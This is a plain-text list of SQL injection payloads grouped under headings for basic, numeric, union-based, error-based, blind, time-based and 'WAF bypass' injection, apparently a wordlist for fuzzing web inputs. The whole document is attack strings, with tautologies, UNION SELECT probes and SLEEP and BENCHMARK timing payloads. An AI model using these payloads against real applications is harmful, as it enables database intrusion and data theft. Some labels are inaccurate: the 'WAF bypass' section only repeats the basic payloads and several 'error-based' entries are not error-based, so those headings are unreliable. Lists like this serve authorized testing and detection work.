# Basic SQL Injection
' OR '1'='1'
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' #
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' #

# Numeric Injection
1 OR 1=1
1 OR 1=1 --
1 OR 1=1 /*
1 OR 1=1 #

# Union-based Injection
' UNION SELECT 1,2,3,4,5 --
' UNION SELECT 1,2,3,4,5 /*
' UNION SELECT 1,2,3,4,5 #
' UNION ALL SELECT 1,2,3,4,5 --
' UNION ALL SELECT 1,2,3,4,5 /*
' UNION ALL SELECT 1,2,3,4,5 #

# Error-based Injection
' OR 1=1 AND 1=0
' OR 1=1 AND 1=0 --
' OR 1=1 AND 1=0 /*
' OR 1=1 AND 1=0 #
' OR 1=1 AND 1=0 AND 1=0
' OR 1=1 AND 1=0 AND 1=0 --
' OR 1=1 AND 1=0 AND 1=0 /*
' OR 1=1 AND 1=0 AND 1=0 #

# Blind SQL Injection
' AND 1=1 --
' AND 1=1 /*
' AND 1=1 #
' AND 1=0 --
' AND 1=0 /*
' AND 1=0 #
' AND 1=1 AND SLEEP(5) --
' AND 1=1 AND SLEEP(5) /*
' AND 1=1 AND SLEEP(5) #

# Time-based Injection
' AND SLEEP(5) --
' AND SLEEP(5) /*
' AND SLEEP(5) #
' AND BENCHMARK(1000000,MD5(1)) --
' AND BENCHMARK(1000000,MD5(1)) /*
' AND BENCHMARK(1000000,MD5(1)) #

# WAF Bypass
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' #
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' #
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' #
